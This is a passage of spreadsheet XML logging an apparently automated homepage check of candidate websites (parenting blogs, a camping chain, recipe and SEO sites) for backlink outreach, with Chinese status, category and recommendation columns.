      </x:c>
      <x:c r="G446" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H446" s="19" t="str">
        <x:v>http://listlunatic.com/</x:v>
      </x:c>
      <x:c r="I446" s="19" t="str">
        <x:v>Home - List Lunatic</x:v>
      </x:c>
      <x:c r="J446" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K446" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L446" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M446" s="19" t="str">
        <x:v>http://listlunatic.com/</x:v>
      </x:c>
      <x:c r="N446" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O446" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P446" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q446" s="21" t="str">
        <x:v>Home - List Lunatic Home Search Home Recent Posts 40 Essential Knots Every Survivalist Needs To Know Tom - March 15, 2019 0 7 Ways To Find True North Without A Compass Tom - December 3, 2018 0 96 Hilarious Christmas Memes Tom - December 3, 2018 0 The 20 Biggest Waterfalls in the World (By Continent) Tom - December 3, 2018 0 Top 10 International Martial Arts admin2 - June 20, 2018 0 Random Posts I don’t always forget to put on deodorant But when I... December 13, 2017 The top 10 most outlandish InfoWars conspiracies September 29, 2017 What every American should know about the Senate Judiciary Committee September 17, 2017 Libertarianism is not what you think September 16, 2017 5 Important Skil</x:v>
      </x:c>
      <x:c r="R446" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S446" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T446" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://listlunatic.com
http://listlunatic.com</x:v>
      </x:c>
    </x:row>
    <x:row r="447">
      <x:c r="A447" s="18" t="str">
        <x:v>446</x:v>
      </x:c>
      <x:c r="B447" s="19" t="str">
        <x:v>thesweetestpart.com</x:v>
      </x:c>
      <x:c r="C447" s="19" t="str">
        <x:v>https://thesweetestpart.com</x:v>
      </x:c>
      <x:c r="D447" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E447" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F447" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G447" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H447" s="19" t="str">
        <x:v>https://thesweetestpart.com/</x:v>
      </x:c>
      <x:c r="I447" s="19" t="str">
        <x:v>Home - the sweetest part</x:v>
      </x:c>
      <x:c r="J447" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K447" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L447" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M447" s="19" t="str">
        <x:v>https://thesweetestpart.com/</x:v>
      </x:c>
      <x:c r="N447" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O447" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P447" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q447" s="21" t="str">
        <x:v>The Sweetest Part is a place to drop the mom guilt, learn to enjoy the simple things, and make stress-free family traditions &amp; special memories with those you love at home! Home - the sweetest part Skip to content Home About Mama Encouragement Recipes Every Day Simple Every Day Special The Sweetest Part is a place to drop the mom guilt , learn to enjoy the simple things, make stress-free family traditions &amp; special memories with those you love! New to The Sweetest Part? Get to know us with a few of our favorite posts… The Best-Ever Cowboy Cookies (With Variations That Will Make Everbody Happy)!! A Birthday Interview: Easily Capturing Your Child’s Memories Each Year! 30 Simple and Memorable Birthday Traditions &amp; Activities Making Memories: A Guilt-free Approach! Top 10 Bible Verses for Kids to Memorize Meal Planning for the Overwhelmed Mom How to Be A Better Mom</x:v>
      </x:c>
      <x:c r="R447" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S447" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T447" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thesweetestpart.com</x:v>
      </x:c>
    </x:row>
    <x:row r="448">
      <x:c r="A448" s="18" t="str">
        <x:v>447</x:v>
      </x:c>
      <x:c r="B448" s="19" t="str">
        <x:v>jewelswandering.com</x:v>
      </x:c>
      <x:c r="C448" s="19" t="str">
        <x:v>https://jewelswandering.com</x:v>
      </x:c>
      <x:c r="D448" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E448" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F448" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G448" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H448" s="19" t="str">
        <x:v>https://www.jewelswandering.com/</x:v>
      </x:c>
      <x:c r="I448" s="19" t="str">
        <x:v>Jewels Wandering</x:v>
      </x:c>
      <x:c r="J448" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K448" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L448" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M448" s="19" t="str">
        <x:v>https://www.jewelswandering.com/</x:v>
      </x:c>
      <x:c r="N448" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O448" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P448" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q448" s="21" t="str">
        <x:v>Jewels Wandering - Travel Blog and New York City Lifestyle Blog of a forever nomad. Come join your new best friend! Jewels Wandering search Home Blog About Contact Privacy Policy Disclaimer Travels Africa MAURITIUS MOROCCO Tanzania Americas USA Asia Pacific AUSTRALIA CAMBODIA EAST TIMOR Indonesia JAPAN LAOS MALAYSIA SINGAPORE THAILAND Vietnam Europe FRANCE United Kingdom Eat/Stay Life &amp; Style Abdominal Myomectomy Beauty Currently Furbaby George Life Lately Recent Reads 5 For the Month jewels wandering Home Blog About Contact Privacy Policy Disclaimer Travels Africa MAURITIUS MOROCCO Tanzania Americas USA Asia Pacific AUSTRALIA CAMBODIA EAST TIMOR Indonesia JAPAN LAOS MALAYSIA SINGAPORE THAILAND Vietnam Europe FRANCE United Kingdom Eat/Stay Life &amp; Style Abdominal Myomectomy Beauty Currently Furbaby George </x:v>
      </x:c>
      <x:c r="R448" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S448" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T448" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://jewelswandering.com</x:v>
      </x:c>
    </x:row>
    <x:row r="449">
      <x:c r="A449" s="18" t="str">
        <x:v>448</x:v>
      </x:c>
      <x:c r="B449" s="19" t="str">
        <x:v>craftskidslove.com</x:v>
      </x:c>
      <x:c r="C449" s="19" t="str">
        <x:v>https://craftskidslove.com</x:v>
      </x:c>
      <x:c r="D449" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E449" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F449" s="20" t="str">
        <x:v>421</x:v>
      </x:c>
      <x:c r="G449" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H449" s="19" t="str">
        <x:v>https://craftskidslove.com/</x:v>
      </x:c>
      <x:c r="I449" s="19" t="str">
        <x:v>421 Misdirected Request</x:v>
      </x:c>
      <x:c r="J449" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K449" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L449" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M449" s="19" t="str">
        <x:v>https://craftskidslove.com/</x:v>
      </x:c>
      <x:c r="N449" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O449" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P449" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q449" s="21" t="str">
        <x:v>421 Misdirected Request Misdirected Request The client needs a new connection for this request as the requested host name does not match the Server Name Indication (SNI) in use for this connection. Apache/2.4.38 (Debian) Server at craftskidslove.com Port 443</x:v>
      </x:c>
      <x:c r="R449" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S449" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T449" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://craftskidslove.com</x:v>
      </x:c>
    </x:row>
    <x:row r="450">
      <x:c r="A450" s="18" t="str">
        <x:v>449</x:v>
      </x:c>
      <x:c r="B450" s="19" t="str">
        <x:v>longwaitforisabella.com</x:v>
      </x:c>
      <x:c r="C450" s="19" t="str">
        <x:v>https://longwaitforisabella.com</x:v>
      </x:c>
      <x:c r="D450" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E450" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F450" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G450" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H450" s="19" t="str">
        <x:v>https://www.longwaitforisabella.com/</x:v>
      </x:c>
      <x:c r="I450" s="19" t="str">
        <x:v>Long Wait For Isabella</x:v>
      </x:c>
      <x:c r="J450" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K450" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L450" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M450" s="19" t="str">
        <x:v>https://www.longwaitforisabella.com/</x:v>
      </x:c>
      <x:c r="N450" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O450" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P450" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q450" s="21" t="str">
        <x:v>Seattle area family lifestyle blog sharing parenting, travel, recipes, and great products. Long Wait For Isabella Home About Me Work With Me Long Wait For Isabella Seattle area family lifestyle blog Faith Children’s Ministry Women’s Ministry Family Life Parenting Travel DIY Marriage Health For The Home Green Living Finance Western WA Food Entertainment Movies Music Books Technology Fashion Kids Fashion Womens Fashion Beauty IG Features What’s New Affordable Prescription Eye Glasses This is a sponsored post. All opinions are mine alone. I can’t think without my glasses. Vivienne Westwood If you’ve been around here for a while, or follow me over on Instagram, you know that I love fun prescription eye glasses. I have about 10 pairs now, and I love to rotate through them depending [&amp;h</x:v>
      </x:c>
      <x:c r="R450" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S450" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T450" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://longwaitforisabella.com</x:v>
      </x:c>
    </x:row>
    <x:row r="451">
      <x:c r="A451" s="18" t="str">
        <x:v>450</x:v>
      </x:c>
      <x:c r="B451" s="19" t="str">
        <x:v>koa.com</x:v>
      </x:c>
      <x:c r="C451" s="19" t="str">
        <x:v>https://koa.com</x:v>
      </x:c>
      <x:c r="D451" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E451" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F451" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G451" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H451" s="19" t="str">
        <x:v>https://koa.com/</x:v>
      </x:c>
      <x:c r="I451" s="19" t="str">
        <x:v>Camping, Campgrounds &amp; Campsites | Camping Reservations | KOA</x:v>
      </x:c>
      <x:c r="J451" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K451" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L451" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M451" s="19" t="str">
        <x:v>https://koa.com/</x:v>
      </x:c>
      <x:c r="N451" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O451" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P451" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q451" s="21" t="str">
        <x:v>Spend your next short term camping or long term camping trip at a KOA campground! Make a reservation at one of our 500+ campgrounds in North America today! Camping, Campgrounds &amp; Campsites | Camping Reservations | KOA Skip to main content KOA AI Chat Connect Connect with KOA At KOA, we love having fun and inviting new folks to join us online as well as at our campgrounds. Share your camping experiences, stories, photos and videos! YouTube Facebook Twitter Pinterest Instagram KOA Newsletter Each month, direct to your email inbox, we&amp;apos;ll send the best camping news, tips, recipes and more, to enhance the camping lifestyle that you love so much. Learn More Please fix the following errors to proceed. Email Address * First Name * Last Name * Country * United States Canada Afghanistan Aland Islands Albania Algeria American Samoa Andorra Angola Ang</x:v>
      </x:c>
      <x:c r="R451" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S451" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T451" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://koa.com</x:v>
      </x:c>
    </x:row>
    <x:row r="452">
      <x:c r="A452" s="18" t="str">
        <x:v>451</x:v>
      </x:c>
      <x:c r="B452" s="19" t="str">
        <x:v>perfectionpending.net</x:v>
      </x:c>
      <x:c r="C452" s="19" t="str">
        <x:v>https://perfectionpending.net</x:v>
      </x:c>
      <x:c r="D452" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E452" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F452" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G452" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H452" s="19" t="str">
        <x:v>https://perfectionpending.net/</x:v>
      </x:c>
      <x:c r="I452" s="19" t="str">
        <x:v>Perfection Pending - By Meredith Ethington</x:v>
      </x:c>
      <x:c r="J452" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K452" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L452" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M452" s="19" t="str">
        <x:v>https://perfectionpending.net/</x:v>
      </x:c>
      <x:c r="N452" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O452" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P452" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q452" s="21" t="str">
        <x:v>By Meredith Ethington Perfection Pending - By Meredith Ethington Perfection Pending By Meredith Ethington My Books The Mother Load Mom Life: Perfection Pending – The Book Free eBook: Sometimes Motherhood Sucks How To Grow Your FB Following Motherhood Inspiration Encouragement Childhood Humor Parenting Memes Friendship Marriage Kid Ideas Recipes Practical Tips Babies &amp; Toddlers teens and tweens The Elementary School Years Mental Health Mental Health Anxiety About Favorite Posts My Portfolio Privacy &amp; Disclosures If you’re looking for the Perfection Pending blog, you’re in the right place! To read the blog and find my latest posts go here . Meredith Ethington is an award winning writer, and published author of The </x:v>
      </x:c>
      <x:c r="R452" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S452" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T452" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://perfectionpending.net</x:v>
      </x:c>
    </x:row>
    <x:row r="453">
      <x:c r="A453" s="18" t="str">
        <x:v>452</x:v>
      </x:c>
      <x:c r="B453" s="19" t="str">
        <x:v>labbeproducciones.cl</x:v>
      </x:c>
      <x:c r="C453" s="19" t="str">
        <x:v>https://labbeproducciones.cl</x:v>
      </x:c>
      <x:c r="D453" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E453" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F453" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G453" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H453" s="19" t="str">
        <x:v>https://labbeproducciones.cl/</x:v>
      </x:c>
      <x:c r="I453" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J453" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K453" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L453" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M453" s="19" t="str">
        <x:v>https://labbeproducciones.cl/</x:v>
      </x:c>
      <x:c r="N453" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O453" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P453" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q453" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R453" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S453" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T453" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://labbeproducciones.cl</x:v>
      </x:c>
    </x:row>
    <x:row r="454">
      <x:c r="A454" s="18" t="str">
        <x:v>453</x:v>
      </x:c>
      <x:c r="B454" s="19" t="str">
        <x:v>stupidsimpleseo.co</x:v>
      </x:c>
      <x:c r="C454" s="19" t="str">
        <x:v>https://stupidsimpleseo.co</x:v>
      </x:c>
      <x:c r="D454" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E454" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F454" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G454" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H454" s="19" t="str">
        <x:v>https://stupidsimpleseo.co/</x:v>
      </x:c>
      <x:c r="I454" s="19" t="str">
        <x:v>Homepage - Stupid Simple SEO</x:v>
      </x:c>
      <x:c r="J454" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K454" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L454" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M454" s="19" t="str">
        <x:v>https://stupidsimpleseo.co/</x:v>
      </x:c>
      <x:c r="N454" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O454" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P454" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q454" s="21" t="str">
        <x:v>Homepage - Stupid Simple SEO Home About Mike Testimonials FREE Blogging Bootcamp Video Training: How To Nail Your Niche, Increase Your Traffic, Build Your Email List, &amp; Make More Money Blogging GET THE BOOTCAMP! Over 5,000 paying students have trusted Mike's programs to level up their blogging skills. Home About Contact Privacy</x:v>
      </x:c>
      <x:c r="R454" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S454" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T454" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://stupidsimpleseo.co</x:v>
      </x:c>
    </x:row>
    <x:row r="455">
      <x:c r="A455" s="18" t="str">
        <x:v>454</x:v>
      </x:c>
      <x:c r="B455" s="19" t="str">
        <x:v>czidro.hu</x:v>
      </x:c>
      <x:c r="C455" s="19" t="str">
        <x:v>https://czidro.hu</x:v>
      </x:c>
      <x:c r="D455" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E455" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F455" s="20" t="str">
        <x:v>500</x:v>
      </x:c>
      <x:c r="G455" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H455" s="19" t="str">
        <x:v>https://czidro.hu/</x:v>
      </x:c>
      <x:c r="I455" s="19" t="str"/>
      <x:c r="J455" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K455" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L455" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M455" s="19" t="str">
        <x:v>https://czidro.hu/</x:v>
      </x:c>
      <x:c r="N455" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O455" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P455" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q455" s="21" t="str"/>
      <x:c r="R455" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S455" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T455" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://czidro.hu</x:v>
      </x:c>
    </x:row>
    <x:row r="456">
      <x:c r="A456" s="18" t="str">
        <x:v>455</x:v>
      </x:c>
      <x:c r="B456" s="19" t="str">
        <x:v>mysillysquirts.com</x:v>
      </x:c>
      <x:c r="C456" s="19" t="str">
        <x:v>https://mysillysquirts.com</x:v>
      </x:c>
      <x:c r="D456" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E456" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F456" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G456" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H456" s="19" t="str">
        <x:v>https://mysillysquirts.com/</x:v>
      </x:c>
      <x:c r="I456" s="19" t="str">
        <x:v>My Silly Squirts - Navigating Motherhood One Day at a Time!</x:v>
      </x:c>
      <x:c r="J456" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K456" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L456" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M456" s="19" t="str">
        <x:v>https://mysillysquirts.com/</x:v>
      </x:c>
      <x:c r="N456" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O456" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P456" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q456" s="21" t="str">
        <x:v>My Silly Squirts - Navigating Motherhood One Day at a Time! Skip to content DIY Food Latter-day Saints Kids Parenting Travel About Kids Kids love this Freddy the Frog alphabet learning game By Marie August 29, 2026 Latter-day Saints The best 9-minute LDS missionary workout (PDF printable) By Marie August 19, 2026 Travel Top six things to do in Las Vegas for first-time visitors By Marie August 9, 2026 DIY How to install a faux brick wall in your basement By Marie July 30, 2026 Kids Play the Left/Right Gift Exchange game at your next party By Marie July 24, 2026 DIY Five tips to transform your backyard patio By Marie July 12, 2026 Search Hello Thanks for visiting my blog! I’m a mom to five sil</x:v>
      </x:c>
      <x:c r="R456" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S456" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T456" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mysillysquirts.com</x:v>
      </x:c>
    </x:row>
    <x:row r="457">
      <x:c r="A457" s="18" t="str">
        <x:v>456</x:v>
      </x:c>
      <x:c r="B457" s="19" t="str">
        <x:v>panmastery.com</x:v>
      </x:c>
      <x:c r="C457" s="19" t="str">
        <x:v>https://panmastery.com</x:v>
      </x:c>
      <x:c r="D457" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E457" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F457" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G457" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H457" s="19" t="str">
        <x:v>https://panmastery.com/</x:v>
      </x:c>
      <x:c r="I457" s="19" t="str">
        <x:v>Pan Mastery | Pan Mastery</x:v>
      </x:c>
      <x:c r="J457" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K457" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L457" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M457" s="19" t="str">
        <x:v>https://panmastery.com/</x:v>
      </x:c>
      <x:c r="N457" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O457" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P457" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q457" s="21" t="str">
        <x:v>Pan Mastery Fine vintage cast iron cookware: Griswold, Wagner, Lodge &amp; more. Pan Mastery | Pan Mastery Skip to content Menu Home Guides &amp; Tips Cleaning &amp; Organizing Recipes Kitchen Tools Menu Home Guides &amp; Tips Cleaning &amp; Organizing Recipes Kitchen Tools Pan Mastery Fine vintage cast iron cookware: Griswold, Wagner, Lodge &amp; more. Traditional Goulash That Tastes Like Grandma Made It Easy Cherry Dump Cake My Boldest Potato Salad with Egg Homemade Dulce de Leche Recipe Hamburger Gravy Grandma’s Classic Veggie Burger Grandma’s Homemade Mincemeat Pie Traditional Beef Stew for a Cozy Evening Steelhead Trout with Lemon Butter Sauce for a Romantic Dinner Christmas Punch That Will Make Your Holiday Party Unforgettable Grandma’s Apple Salad Healthy Tater Tot Hotdish Tweet Pin </x:v>
      </x:c>
      <x:c r="R457" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S457" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T457" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://panmastery.com</x:v>
      </x:c>
    </x:row>
    <x:row r="458">
      <x:c r="A458" s="18" t="str">
        <x:v>457</x:v>
      </x:c>
      <x:c r="B458" s="19" t="str">
        <x:v>pistachioproject.com</x:v>
      </x:c>
      <x:c r="C458" s="19" t="str">
        <x:v>https://pistachioproject.com</x:v>
      </x:c>
      <x:c r="D458" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E458" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F458" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G458" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H458" s="19" t="str">
        <x:v>https://pistachioproject.com/</x:v>
      </x:c>
      <x:c r="I458" s="19" t="str">
        <x:v>The Pistachio Project - The Pistachio Project</x:v>
      </x:c>
      <x:c r="J458" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K458" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L458" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M458" s="19" t="str">
        <x:v>https://pistachioproject.com/</x:v>
      </x:c>
      <x:c r="N458" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O458" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P458" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q458" s="21" t="str">
